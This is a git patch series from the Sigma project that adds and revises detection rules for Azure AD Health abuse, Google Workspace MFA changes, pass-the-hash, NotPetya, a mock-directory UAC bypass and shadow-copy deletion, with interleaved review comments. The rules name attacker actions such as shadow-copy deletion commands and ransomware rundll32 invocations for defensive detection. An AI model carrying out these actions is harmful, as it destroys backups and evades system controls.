@@ -1,6 +1,8 @@ # Output backends for sigmac # Copyright 2021 Lacework, Inc. -# Author: +# Authors: +# David Hazekamp (david.hazekamp@lacework.net) +# Rachel Rice (rachel.rice@lacework.net) # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU Lesser General Public License as published by @@ -26,7 +28,6 @@ from sigma.parser.modifiers.base import SigmaTypeModifier LACEWORK_CONFIG = yaml.load( - # TODO: build this out to support all the default aws sigma rules textwrap.dedent(''' --- version: 0.1 From f98970ef0603a7e775fd501c9d53235bfe53fa92 Mon Sep 17 00:00:00 2001 From: Roberto Rodriguez Date: Thu, 26 Aug 2021 16:10:42 -0400 Subject: [PATCH 0605/1367] adding basic rules to detect behavior around AAD health agents and AAD Hybrid Health AD FS services in Azure --- .../azure_aadhybridhealth_adfs_new_server.yml | 26 +++++++++++++ ...re_aadhybridhealth_adfs_service_delete.yml | 26 +++++++++++++ .../win_aadhealth_mon_agent_regkey_access.yml | 35 ++++++++++++++++++ .../win_aadhealth_svc_agent_regkey_access.yml | 37 +++++++++++++++++++ 4 files changed, 124 insertions(+) create mode 100644 rules/cloud/azure/azure_aadhybridhealth_adfs_new_server.yml create mode 100644 rules/cloud/azure/azure_aadhybridhealth_adfs_service_delete.yml create mode 100644 rules/windows/builtin/win_aadhealth_mon_agent_regkey_access.yml create mode 100644 rules/windows/builtin/win_aadhealth_svc_agent_regkey_access.yml diff --git a/rules/cloud/azure/azure_aadhybridhealth_adfs_new_server.yml b/rules/cloud/azure/azure_aadhybridhealth_adfs_new_server.yml new file mode 100644 index 00000000..6a06f19b --- /dev/null +++ b/rules/cloud/azure/azure_aadhybridhealth_adfs_new_server.yml 
@@ -0,0 +1,26 @@ +title: Azure Active Directory Hybrid Health AD FS New Server +id: 288a39fc-4914-4831-9ada-270e9dc12cb4 +description: | + This detection uses AzureActivity logs (Administrative category) to identify the creation or update of a server instance in an Azure AD Hybrid health AD FS service. + A threat actor can create a new AD Health ADFS service and create a fake server instance to spoof AD FS signing logs. There is no need to compromise an on-prem AD FS server. + This can be done programmatically via HTTP requests to Azure. +status: experimental +date: 2021/08/26 +author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC +tags: + - attack.defense_evasion + - attack.t1578 +references: + - https://o365blog.com/post/hybridhealthagent/ +logsource: + service: AzureActivity +detection: + selection: + CategoryValue: 'Administrative' + ResourceProviderValue: 'Microsoft.ADHybridHealthService' + ResourceId|contains: 'AdFederationService' + OperationNameValue: 'Microsoft.ADHybridHealthService/services/servicemembers/action' + condition: selection +falsepositives: + - legitimate AD FS servers added to an AAD Health AD FS service instance +level: medium \ No newline at end of file diff --git a/rules/cloud/azure/azure_aadhybridhealth_adfs_service_delete.yml b/rules/cloud/azure/azure_aadhybridhealth_adfs_service_delete.yml new file mode 100644 index 00000000..a4bd4e63 --- /dev/null +++ b/rules/cloud/azure/azure_aadhybridhealth_adfs_service_delete.yml 
@@ -0,0 +1,26 @@ +title: Azure Active Directory Hybrid Health AD FS Service Delete +id: 48739819-8230-4ee3-a8ea-e0289d1fb0ff +description: | + This detection uses AzureActivity logs (Administrative category) to identify the deletion of an Azure AD Hybrid health AD FS service instance in a tenant. + A threat actor can create a new AD Health ADFS service and create a fake server to spoof AD FS signing logs. + The health AD FS service can then be deleted after it is not longer needed via HTTP requests to Azure. +status: experimental +date: 2021/08/26 +author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC +tags: + - attack.defense_evasion + - attack.t1578.003 +references: + - https://o365blog.com/post/hybridhealthagent/ +logsource: + service: AzureActivity +detection: + selection: + CategoryValue: 'Administrative' + ResourceProviderValue: 'Microsoft.ADHybridHealthService' + ResourceId|contains: 'AdFederationService' + OperationNameValue: 'Microsoft.ADHybridHealthService/services/delete' + condition: selection +falsepositives: + - legitimate AAD Health AD FS service instances being deleted in a tenant +level: medium \ No newline at end of file diff --git a/rules/windows/builtin/win_aadhealth_mon_agent_regkey_access.yml b/rules/windows/builtin/win_aadhealth_mon_agent_regkey_access.yml new file mode 100644 index 00000000..7636940d --- /dev/null +++ b/rules/windows/builtin/win_aadhealth_mon_agent_regkey_access.yml 
@@ -0,0 +1,35 @@ +title: Azure AD Health Monitoring Agent Registry Keys Access +id: ff151c33-45fa-475d-af4f-c2f93571f4fe +description: | + This detection uses Windows security events to detect suspicious access attempts to the registry key of Azure AD Health monitoring agent. + This detection requires an access control entry (ACE) on the system access control list (SACL) of the following securable object HKLM\SOFTWARE\Microsoft\Microsoft Online\Reporting\MonitoringAgent. +status: experimental +date: 2021/08/26 +author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC +tags: + - attack.discovery + - attack.t1012 +references: + - https://o365blog.com/post/hybridhealthagent/ + - https://github.com/OTRF/Set-AuditRule/blob/master/rules/registry/aad_connect_health_monitoring_agent.yml +logsource: + product: windows + service: security +detection: + selection: + EventID: + - 4656 + - 4663 + ObjectType: 'Key' + ObjectName: '\REGISTRY\MACHINE\SOFTWARE\Microsoft\Microsoft Online\Reporting\MonitoringAgent' + filter: + ProcessName|contains: + - 'Microsoft.Identity.Health.Adfs.DiagnosticsAgent.exe' + - 'Microsoft.Identity.Health.Adfs.InsightsService.exe' + - 'Microsoft.Identity.Health.Adfs.MonitoringAgent.Startup.exe' + - 'Microsoft.Identity.Health.Adfs.PshSurrogate.exe' + - 'Microsoft.Identity.Health.Common.Clients.ResourceMonitor.exe' + condition: selection and not filter +falsepositives: + - Unknown +level: medium diff --git a/rules/windows/builtin/win_aadhealth_svc_agent_regkey_access.yml b/rules/windows/builtin/win_aadhealth_svc_agent_regkey_access.yml new file mode 100644 index 00000000..fa30f12d --- /dev/null +++ b/rules/windows/builtin/win_aadhealth_svc_agent_regkey_access.yml 
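Review bot: The filter keys on `ProcessName|contains` with bare executable names, so any process whose path merely contains one of those strings is excluded from the alert; anchoring the match with `ProcessName|endswith` on the full expected path (`'\<agent install dir>\Microsoft.Identity.Health.Adfs.DiagnosticsAgent.exe'` and so on, once the directory is confirmed) keeps the exclusion to the genuine agent binaries. The same filter is repeated verbatim in win_aadhealth_svc_agent_regkey_access.yml and should be tightened there too.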
@@ -0,0 +1,37 @@ +title: Azure AD Health Service Agents Registry Keys Access +id: 1d2ab8ac-1a01-423b-9c39-001510eae8e8 +description: | + This detection uses Windows security events to detect suspicious access attempts to the registry key values and sub-keys of Azure AD Health service agents (e.g AD FS). + Information from AD Health service agents can be used to potentially abuse some of the features provided by those services in the cloud (e.g. Federation). + This detection requires an access control entry (ACE) on the system access control list (SACL) of the following securable object: HKLM:\SOFTWARE\Microsoft\ADHealthAgent. + Make sure you set the SACL to propagate to its sub-keys. +status: experimental +date: 2021/08/26 +author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC +tags: + - attack.discovery + - attack.t1012 +references: + - https://o365blog.com/post/hybridhealthagent/ + - https://github.com/OTRF/Set-AuditRule/blob/master/rules/registry/aad_connect_health_service_agent.yml +logsource: + product: windows + service: security +detection: + selection: + EventID: + - 4656 + - 4663 + ObjectType: 'Key' + ObjectName: '\REGISTRY\MACHINE\SOFTWARE\Microsoft\ADHealthAgent' + filter: + ProcessName|contains: + - 'Microsoft.Identity.Health.Adfs.DiagnosticsAgent.exe' + - 'Microsoft.Identity.Health.Adfs.InsightsService.exe' + - 'Microsoft.Identity.Health.Adfs.MonitoringAgent.Startup.exe' + - 'Microsoft.Identity.Health.Adfs.PshSurrogate.exe' + - 'Microsoft.Identity.Health.Common.Clients.ResourceMonitor.exe' + condition: selection and not filter +falsepositives: + - Unknown +level: medium From 1fffb7a3f51f920983d22e6f3a19ecf1fb28c40e Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Thu, 26 Aug 2021 20:28:35 -0500 Subject: [PATCH 0606/1367] Gworkspace MFA disabled. --- .../gworkspace/gworkspace_mfa_disabled.yml | 27 +++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 rules/cloud/gworkspace/gworkspace_mfa_disabled.yml 
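Review bot: The description says the rule covers "registry key values and sub-keys" and asks for the SACL to propagate to sub-keys, but `ObjectName: '\REGISTRY\MACHINE\SOFTWARE\Microsoft\ADHealthAgent'` is an exact match, so 4656/4663 events whose ObjectName is a sub-key path are never selected; `ObjectName|startswith: '\REGISTRY\MACHINE\SOFTWARE\Microsoft\ADHealthAgent'` matches the stated intent. The description also spells the key as `HKLM:\SOFTWARE\...` (PowerShell drive form) while the sibling rule uses `HKLM\SOFTWARE\...`; pick one form for both.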
diff --git a/rules/cloud/gworkspace/gworkspace_mfa_disabled.yml b/rules/cloud/gworkspace/gworkspace_mfa_disabled.yml new file mode 100644 index 00000000..3730e5c1 --- /dev/null +++ b/rules/cloud/gworkspace/gworkspace_mfa_disabled.yml @@ -0,0 +1,27 @@ +title: Google Workspace MFA Disabled +id: 780601d1-6376-4f2a-884e-b8d45599f78c +description: Detects when multi-factor authentication (MFA) is disabled. +author: Austin Songer +status: experimental +date: 2021/08/26 +references: + - https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3 + - https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-security-settings#ENFORCE_STRONG_AUTHENTICATION + - https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-security-settings?hl=en#ALLOW_STRONG_AUTHENTICATION +logsource: + service: google_workspace.admin +detection: + selection: + eventService: admin.googleapis.com + eventName: + - ENFORCE_STRONG_AUTHENTICATION + - ALLOW_STRONG_AUTHENTICATION + eventValue: + new_value: false + condition: all of them +level: medium +tags: + - attack.impact +falsepositives: + - MFA may be disabled and performed by a system administrator. + \ No newline at end of file From 55f5ff3d89cc10cc2221be91fa291bb32c1c4095 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Thu, 26 Aug 2021 20:55:07 -0500 Subject: [PATCH 0607/1367] Application Removed --- .../gworkspace_application_remove.yml | 25 +++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 rules/cloud/gworkspace/gworkspace_application_remove.yml diff --git a/rules/cloud/gworkspace/gworkspace_application_remove.yml b/rules/cloud/gworkspace/gworkspace_application_remove.yml new file mode 100644 index 00000000..90e05d4d --- /dev/null +++ b/rules/cloud/gworkspace/gworkspace_application_remove.yml 
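Review bot: `eventValue:` is given a nested mapping (`new_value: false`) rather than a scalar or list, which is not a field/value pair the Sigma detection grammar defines, so backends will most likely reject or mis-render it; if the intended field is a flattened name such as `eventValue.new_value`, write it as one key with a quoted value, e.g. `eventValue.new_value: 'false'`, after confirming the google_workspace.admin field naming. `condition: all of them` with a single selection is valid but `condition: selection` says what is meant. The file also ends with a whitespace-only line and no trailing newline, which this series fixes for gworkspace_application_remove.yml but not here.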
@@ -0,0 +1,25 @@ +title: Google Workspace Application Removed +id: ee2803f0-71c8-4831-b48b-a1fc57601ee4 +description: Detects when an an application is removed from Google Workspace. +author: Austin Songer +status: experimental +date: 2021/08/26 +references: + - https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3 + - https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-domain-settings?hl=en#REMOVE_APPLICATION + - https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-domain-settings?hl=en#REMOVE_APPLICATION_FROM_WHITELIST +logsource: + service: google_workspace.admin +detection: + selection: + eventService: admin.googleapis.com + eventName: + - REMOVE_APPLICATION + - REMOVE_APPLICATION_FROM_WHITELIST + condition: selection +level: medium +tags: + - attack.impact +falsepositives: + - Application being removed may be performed by a System Administrator. + \ No newline at end of file From bc246ff59da2d587fa501ea2176960d3200858bc Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Thu, 26 Aug 2021 20:58:22 -0500 Subject: [PATCH 0608/1367] Rename gworkspace_application_remove.yml to gworkspace_application_remove.dyml --- ...pplication_remove.yml => gworkspace_application_remove.dyml} | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) rename rules/cloud/gworkspace/{gworkspace_application_remove.yml => gworkspace_application_remove.dyml} (99%) diff --git a/rules/cloud/gworkspace/gworkspace_application_remove.yml b/rules/cloud/gworkspace/gworkspace_application_remove.dyml similarity index 99% rename from rules/cloud/gworkspace/gworkspace_application_remove.yml rename to rules/cloud/gworkspace/gworkspace_application_remove.dyml index 90e05d4d..78580618 100644 --- a/rules/cloud/gworkspace/gworkspace_application_remove.yml +++ b/rules/cloud/gworkspace/gworkspace_application_remove.dyml 
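Review bot: `description: Detects when an an application is removed from Google Workspace.` has a doubled article; `description: Detects when an application is removed from Google Workspace.` The two patches that follow only rename the file and strip the trailing blank line, so the typo survives into gworkspace_application_removed.yml.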
@@ -22,4 +22,4 @@ tags: - attack.impact falsepositives: - Application being removed may be performed by a System Administrator. - \ No newline at end of file + From 62cefcc0281395db5b2cb02db78082732fa75a7e Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Thu, 26 Aug 2021 21:15:56 -0500 Subject: [PATCH 0609/1367] Rename gworkspace_application_remove.dyml to gworkspace_application_removed.yml --- ...application_remove.dyml => gworkspace_application_removed.yml} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename rules/cloud/gworkspace/{gworkspace_application_remove.dyml => gworkspace_application_removed.yml} (100%) diff --git a/rules/cloud/gworkspace/gworkspace_application_remove.dyml b/rules/cloud/gworkspace/gworkspace_application_removed.yml similarity index 100% rename from rules/cloud/gworkspace/gworkspace_application_remove.dyml rename to rules/cloud/gworkspace/gworkspace_application_removed.yml From 72485a5619c49d74cfb8ea4eac50661becb0a38a Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Thu, 26 Aug 2021 21:16:21 -0500 Subject: [PATCH 0610/1367] Update gworkspace_application_removed.yml --- rules/cloud/gworkspace/gworkspace_application_removed.yml | 1 - 1 file changed, 1 deletion(-) diff --git a/rules/cloud/gworkspace/gworkspace_application_removed.yml b/rules/cloud/gworkspace/gworkspace_application_removed.yml index 78580618..7ed76524 100644 --- a/rules/cloud/gworkspace/gworkspace_application_removed.yml +++ b/rules/cloud/gworkspace/gworkspace_application_removed.yml @@ -22,4 +22,3 @@ tags: - attack.impact falsepositives: - Application being removed may be performed by a System Administrator. - From 8bdd3e3987365064210ff8ec8c4fe392f41b3483 Mon Sep 17 00:00:00 2001 From: Evan Yu Date: Fri, 27 Aug 2021 11:26:40 -0400 Subject: [PATCH 0611/1367] Simplify Pass the Pash rule --- rules/windows/builtin/win_pass_the_hash.yml | 17 +++++++---------- 1 file changed, 7 insertions(+), 10 deletions(-) 
diff --git a/rules/windows/builtin/win_pass_the_hash.yml b/rules/windows/builtin/win_pass_the_hash.yml index 805d9137..42af2c80 100644 --- a/rules/windows/builtin/win_pass_the_hash.yml +++ b/rules/windows/builtin/win_pass_the_hash.yml @@ -17,16 +17,13 @@ logsource: definition: The successful use of PtH for lateral movement between workstations would trigger event ID 4624, a failed logon attempt would trigger an event ID 4625 detection: selection: - - EventID: 4624 - LogonType: '3' - LogonProcessName: 'NtLmSsp' - WorkstationName: '%Workstations%' - ComputerName: '%Workstations%' - - EventID: 4625 - LogonType: '3' - LogonProcessName: 'NtLmSsp' - WorkstationName: '%Workstations%' - ComputerName: '%Workstations%' + EventID: + - 4624 + - 4625 + LogonType: '3' + LogonProcessName: 'NtLmSsp' + WorkstationName: '%Workstations%' + ComputerName: '%Workstations%' filter: AccountName: 'ANONYMOUS LOGON' condition: selection and not filter From 178d82e9cd85e617239d539c928031635c869d66 Mon Sep 17 00:00:00 2001 From: Evan Yu Date: Fri, 27 Aug 2021 11:53:50 -0400 Subject: [PATCH 0612/1367] Fix NotPetya Ransomware rule --- rules/windows/process_creation/win_malware_notpetya.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/process_creation/win_malware_notpetya.yml b/rules/windows/process_creation/win_malware_notpetya.yml index 4f0d44bf..6ef6b416 100644 --- a/rules/windows/process_creation/win_malware_notpetya.yml +++ b/rules/windows/process_creation/win_malware_notpetya.yml @@ -30,7 +30,7 @@ detection: rundll32_dash1: Image|endswith: '\rundll32.exe' CommandLine|endswith: '.dat,#1' - perfc_keyword|contains: + perfc_keyword: - '\perfc.dat' condition: 1 of them fields: From f78225c394af8c597b1f237e5173c2898c7a3f16 Mon Sep 17 00:00:00 2001 
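Review bot: The merged `selection` mixes bare integers in the `EventID` list with the quoted string `'3'` for `LogonType`; how a backend treats a quoted versus a bare number can differ, so keep the typing uniform within the map — `LogonType: 3` matches the style of the `EventID` entries, or quote the IDs as well. The restructuring itself is equivalent to the two list entries it replaces (the `EventID` list is an OR and the remaining keys were identical in both), so there is no logic concern.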
From: Florian Roth
Date: Fri, 27 Aug 2021 18:12:21 +0200
Subject: [PATCH 0613/1367] rule: UAC bypass by mocking dirs
---
 .../win_susp_uac_bypass_trustedpath.yml | 23 +++++++++++++++++++
 1 file changed, 23 insertions(+)
 create mode 100644 rules/windows/process_creation/win_susp_uac_bypass_trustedpath.yml
diff --git a/rules/windows/process_creation/win_susp_uac_bypass_trustedpath.yml b/rules/windows/process_creation/win_susp_uac_bypass_trustedpath.yml
new file mode 100644
index 00000000..1859e846
--- /dev/null
+++ b/rules/windows/process_creation/win_susp_uac_bypass_trustedpath.yml
@@ -0,0 +1,23 @@
+title: TrustedPath UAC Bypass Pattern
+id: 4ac47ed3-44c2-4b1f-9d51-bf46e8914126
+status: experimental
+description: Detects indicators of a UAC bypass method by mocking directories
+references:
+ - https://medium.com/tenable-techblog/uac-bypass-by-mocking-trusted-directories-24a96675f6e
+ - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows
+ - https://github.com/netero1010/TrustedPath-UACBypass-BOF
+author: Florian Roth
+date: 2021/08/27
+tags:
+ - attack.defense_evasion
+ - attack.t1548.002
+logsource:
+ category: process_creation
+ product: windows
+detection:
+ selection:
+ Image|contains: 'C:\Windows \System32\'
+ condition: selection
+falsepositives:
+ - Unknown
+level: critical
From ef6e0c5a4c6865af6238d210811c24902b4a85ee Mon Sep 17 00:00:00 2001
From: frack113
Date: Sat, 28 Aug 2021 08:02:16 +0200
Subject: [PATCH 0614/1367] Fix error and FP
---
 .../powershell/powershell_alternate_powershell_hosts.yml | 4 ++--
 .../powershell_delete_volume_shadow_copies.yml | 9 ++++-----
 2 files changed, 6 insertions(+), 7 deletions(-)
diff --git a/rules/windows/powershell/powershell_alternate_powershell_hosts.yml b/rules/windows/powershell/powershell_alternate_powershell_hosts.yml
index 582da352..5078913e 100644
--- a/rules/windows/powershell/powershell_alternate_powershell_hosts.yml
+++ b/rules/windows/powershell/powershell_alternate_powershell_hosts.yml
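Review bot: The only signal in this rule is the space inside `'C:\Windows \System32\'`, which a later edit or an automated whitespace cleanup can silently remove; add a comment above the selection such as `# the space after "Windows" is intentional: the mock directory is "C:\Windows \"` so the next maintainer does not "fix" it. `level: critical` together with `falsepositives: - Unknown` is consistent with a path that should never exist on a clean system, so no concern there.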
@@ -4,7 +4,7 @@ id: 64e8e417-c19a-475a-8d19-98ea705394cc description: Detects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe status: test date: 2019/08/11 -modified: 2021/08/18 +modified: 2021/08/28 author: Roberto Rodriguez @Cyb3rWard0g references: - https://threathunterplaybook.com/notebooks/windows/02_execution/WIN-190815181010.html @@ -39,5 +39,5 @@ detection: EventID: 400 HostApplication: '*' filter: - HostApplication|endswith: 'powershell.exe' + HostApplication|startswith: 'C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe' condition: selection and not filter \ No newline at end of file diff --git a/rules/windows/powershell/powershell_delete_volume_shadow_copies.yml b/rules/windows/powershell/powershell_delete_volume_shadow_copies.yml index 456b0b2d..a496ed90 100644 --- a/rules/windows/powershell/powershell_delete_volume_shadow_copies.yml +++ b/rules/windows/powershell/powershell_delete_volume_shadow_copies.yml @@ -11,26 +11,25 @@ tags: status: experimental author: frack113 date: 2021/06/03 -modified: 2021/08/03 +modified: 2021/08/28 logsource: product: windows service: powershell-classic definition: fields have to be extract from event detection: selection_obj: - CommandLine|contains|all: + HostApplication|contains|all: - 'Get-WmiObject' - ' Win32_Shadowcopy' selection_del: - CommandLine|contains: + HostApplication|contains: - 'Delete()' - 'Remove-WmiObject' selection_eventid: EventID: 400 condition: selection_obj and selection_del and selection_eventid fields: - - CommandLine - - ParentCommandLine + - HostApplication falsepositives: - Legitimate Administrator deletes Shadow Copies using operating systems utilities for legitimate reason level: critical From 68237dffc4b3d04a466d0bd5a9562fd8bf7f8767 Mon Sep 17 00:00:00 2001 
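Review bot: The new filter `HostApplication|startswith: 'C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe'` exempts exactly one absolute path, so the 32-bit host at `C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe` and any installation whose system drive is not `C:` will now be reported as an alternate host. Make the filter a two-item list covering the System32 and SysWOW64 paths, and note that the upper-case `WINDOWS` only matches where the backend compares case-insensitively. Replacing the old `endswith: 'powershell.exe'` was the right call, since any binary with that name satisfied it; the narrower filter just needs the second path.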
From: frack113 Date: Sat, 28 Aug 2021 08:18:47 +0200 Subject: [PATCH 0615/1367] fix HostApplication --- rules/windows/powershell/powershell_xor_commandline.yml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/rules/windows/powershell/powershell_xor_commandline.yml b/rules/windows/powershell/powershell_xor_commandline.yml index 74905593..f4fc893d 100644 --- a/rules/windows/powershell/powershell_xor_commandline.yml +++ b/rules/windows/powershell/powershell_xor_commandline.yml @@ -4,6 +4,7 @@ description: Detects suspicious powershell process which includes bxor command, status: experimental author: Teymur Kheirkhabarov, Harish Segar (rule) date: 2020/06/29 +modified: 2021/08/28 tags: - attack.execution - attack.t1059.001 @@ -17,7 +18,7 @@ detection: EventID: 400 HostName: "ConsoleHost" filter: - CommandLine|contains: + HostApplication|contains: - "bxor" - "join" - "char" From 6aae623f4587d4f23c7b8a188a9c4566f374b748 Mon Sep 17 00:00:00 2001 From: frack113 Date: Sat, 28 Aug 2021 08:42:02 +0200 Subject: [PATCH 0616/1367] Remove duplicate file --- tools/config/powershell-windows-all.yml | 91 ------------------------- 1 file changed, 91 deletions(-) delete mode 100644 tools/config/powershell-windows-all.yml diff --git a/tools/config/powershell-windows-all.yml b/tools/config/powershell-windows-all.yml deleted file mode 100644 index a32dd3f8..00000000 --- a/tools/config/powershell-windows-all.yml +++ /dev/null 
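Review bot: `HostApplication|contains:` over a list is an OR, so after this change any host command line containing `join` or `char` satisfies `filter` on its own; if the selection is meant to capture the bxor-decode pattern as a whole, `HostApplication|contains|all:` is the intended modifier. The `condition` that combines `filter` with the other selections lies outside the hunk, so I cannot confirm how it is used, but the field rename alone does not change this OR semantics, and `char`/`join` are common enough in benign host command lines that the OR will be noisy.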
@@ -1,91 +0,0 @@ -logsources: - windows-application: - product: windows - service: application - conditions: - LogName: 'Application' - windows-security: - product: windows - service: security - conditions: - LogName: 'Security' - windows-system: - product: windows - service: system - conditions: - LogName: 'System' - windows-sysmon: - product: windows - service: sysmon - conditions: - LogName: 'Microsoft-Windows-Sysmon/Operational' - windows-powershell: - product: windows - service: powershell - conditions: - LogName: 'Microsoft-Windows-PowerShell/Operational' - windows-classicpowershell: - product: windows - service: powershell-classic - conditions: - LogName: 'Windows PowerShell' - windows-taskscheduler: - product: windows - service: taskscheduler - conditions: - LogName: 'Microsoft-Windows-TaskScheduler/Operational' - windows-wmi: - product: windows - service: wmi - conditions: - LogName: 'Microsoft-Windows-WMI-Activity/Operational' - windows-dns-server: - product: windows - service: dns-server - category: dns - conditions: - LogName: 'DNS Server' - windows-dns-server-audit: - product: windows - service: dns-server-audit - conditions: - LogName: 'Microsoft-Windows-DNS-Server/Audit' - windows-driver-framework: - product: windows - service: driver-framework - conditions: - LogName: 'Microsoft-Windows-DriverFrameworks-UserMode/Operational' - windows-ntlm: - product: windows - service: ntlm - conditions: - LogName: 'Microsoft-Windows-NTLM/Operational' - windows-applocker: - product: windows - service: applocker - conditions: - LogName: - - 'Microsoft-Windows-AppLocker/MSI and Script' - - 'Microsoft-Windows-AppLocker/EXE and DLL' - - 'Microsoft-Windows-AppLocker/Packaged app-Deployment' - - 'Microsoft-Windows-AppLocker/Packaged app-Execution' - windows-msexchange-management: - product: windows - service: msexchange-management - conditions: - LogName: 'MSExchange Management' - windows-printservice-admin: - product: windows - service: printservice-admin - conditions: 
- LogName: 'Microsoft-Windows-PrintService/Admin' - windows-printservice-operational: - product: windows - service: printservice-operational - conditions: - LogName: 'Microsoft-Windows-PrintService/Operational' - windows-smbclient-security: - product: windows - service: smbclient-security - conditions: - LogName: 'Microsoft-Windows-SmbClient/Security' \ No newline at end of file From 5f1143247b6cf6fba64d5bfa114e5545b9aff02a Mon Sep 17 00:00:00 2001 From: frack113 Date: Sat, 28 Aug 2021 08:51:58 +0200 Subject: [PATCH 0617/1367] Update "sigmac -l" message --- tools/sigma/backends/ee-outliers.py | 2 +- tools/sigma/backends/elasticsearch.py | 10 ++++++---- tools/sigma/backends/lacework.py | 4 +--- tools/sigma/backends/sysmon.py | 1 + 4 files changed, 9 insertions(+), 8 deletions(-) diff --git a/tools/sigma/backends/ee-outliers.py b/tools/sigma/backends/ee-outliers.py index 4a912d11..8904bdd7 100644 --- a/tools/sigma/backends/ee-outliers.py +++ b/tools/sigma/backends/ee-outliers.py @@ -23,7 +23,7 @@ from io import StringIO class OutliersBackend(ElasticsearchDSLBackend, MultiRuleOutputMixin): - """ee-outliers backend""" + """Converts Sigma rule into ee-outliers""" identifier = 'ee-outliers' active = True diff --git a/tools/sigma/backends/elasticsearch.py b/tools/sigma/backends/elasticsearch.py index 76620993..480c56a1 100644 --- a/tools/sigma/backends/elasticsearch.py +++ b/tools/sigma/backends/elasticsearch.py @@ -387,7 +387,7 @@ class ElasticsearchQuerystringBackendLogRhythm(DeepFieldMappingMixin, Elasticsea return super().generateSubexpressionNode(node) class ElasticsearchEQLBackend(DeepFieldMappingMixin, ElasticsearchWildcardHandlingMixin, SingleTextQueryBackend): - """Converts Sigma rule into EQL.""" + """Converts Sigma rule into Elasticsearch EQL query.""" identifier = "es-eql" active = True 
@@ -501,7 +501,7 @@ class ElasticsearchEQLBackend(DeepFieldMappingMixin, ElasticsearchWildcardHandli return fieldname class ElasticsearchDSLBackend(DeepFieldMappingMixin, RulenameCommentMixin, ElasticsearchWildcardHandlingMixin, BaseBackend): - """ElasticSearch DSL backend""" + """Converts Sigma rule into Elasticsearch DSL query""" identifier = 'es-dsl' active = True options = RulenameCommentMixin.options + ElasticsearchWildcardHandlingMixin.options + ( @@ -1397,7 +1397,7 @@ class ElastalertBackend(DeepFieldMappingMixin, MultiRuleOutputMixin): # return result class ElastalertBackendDsl(ElastalertBackend, ElasticsearchDSLBackend): - """Elastalert backend""" + """Converts Sigma rule into ElastAlert DSL query""" identifier = 'elastalert-dsl' def __init__(self, *args, **kwargs): super().__init__(*args, **kwargs) @@ -1410,7 +1410,7 @@ class ElastalertBackendDsl(ElastalertBackend, ElasticsearchDSLBackend): return self.queries class ElastalertBackendQs(ElastalertBackend, ElasticsearchQuerystringBackend): - """Elastalert backend""" + """Converts Sigma rule into ElastAlert QS query""" identifier = 'elastalert' def __init__(self, *args, **kwargs): super().__init__(*args, **kwargs) @@ -1656,12 +1656,14 @@ class ElasticSearchRuleBackend(object): class ElasticSearchRuleEqlBackend(ElasticSearchRuleBackend, ElasticsearchEQLBackend): + """Converts Sigma rule into Elastic SIEM EQL query""" default_rule_type = "eql" identifier = "es-rule-eql" def __init__(self, *args, **kwargs): super().__init__(*args, **kwargs) class ElasticSearchRuleQsBackend(ElasticSearchRuleBackend, ElasticsearchQuerystringBackend): + """Converts Sigma rule into Elastic SIEM lucene query""" identifier = "es-rule" def __init__(self, *args, **kwargs): super().__init__(*args, **kwargs) diff --git a/tools/sigma/backends/lacework.py b/tools/sigma/backends/lacework.py index 2f567088..d28c3053 100644 --- a/tools/sigma/backends/lacework.py +++ b/tools/sigma/backends/lacework.py 
@@ -102,9 +102,7 @@ yaml.add_representer(str, str_presenter) class LaceworkBackend(SingleTextQueryBackend): - """ - Converts Sigma rule into Lacework Policy Platform - """ + """Converts Sigma rule into Lacework Policy Platform""" identifier = "lacework" active = True # our approach to config will be such that we support both an diff --git a/tools/sigma/backends/sysmon.py b/tools/sigma/backends/sysmon.py index 96302181..ce1524e6 100644 --- a/tools/sigma/backends/sysmon.py +++ b/tools/sigma/backends/sysmon.py @@ -8,6 +8,7 @@ from .exceptions import NotSupportedError class SysmonConfigBackend(SingleTextQueryBackend, MultiRuleOutputMixin): + """Converts Sigma rule into sysmon XML configuration""" identifier = "sysmon" active = True andToken = " AND " From 4c414b2e8bb8d9f0eb87755cfc958d30f80b128b Mon Sep 17 00:00:00 2001 From: frack113 Date: Sun, 29 Aug 2021 08:52:54 +0200 Subject: [PATCH 0618/1367] fix Base backend doesn't support multiple conditions (33) --- .../win_susp_failed_logons_single_source.yml | 23 +++++++++++-------- 1 file changed, 13 insertions(+), 10 deletions(-) diff --git a/rules/windows/builtin/win_susp_failed_logons_single_source.yml b/rules/windows/builtin/win_susp_failed_logons_single_source.yml index ab3caa80..cf0ce27f 100644 --- a/rules/windows/builtin/win_susp_failed_logons_single_source.yml +++ b/rules/windows/builtin/win_susp_failed_logons_single_source.yml @@ -1,9 +1,10 @@ +action: global title: Failed Logins with Different Accounts from Single Source System id: e98374a6-e2d9-4076-9b5c-11bdb2569995 description: Detects suspicious failed logins with different user accounts from a single source system author: Florian Roth date: 2017/01/10 -modified: 2021/07/07 +modified: 2021/08/29 tags: - attack.persistence - attack.privilege_escalation 
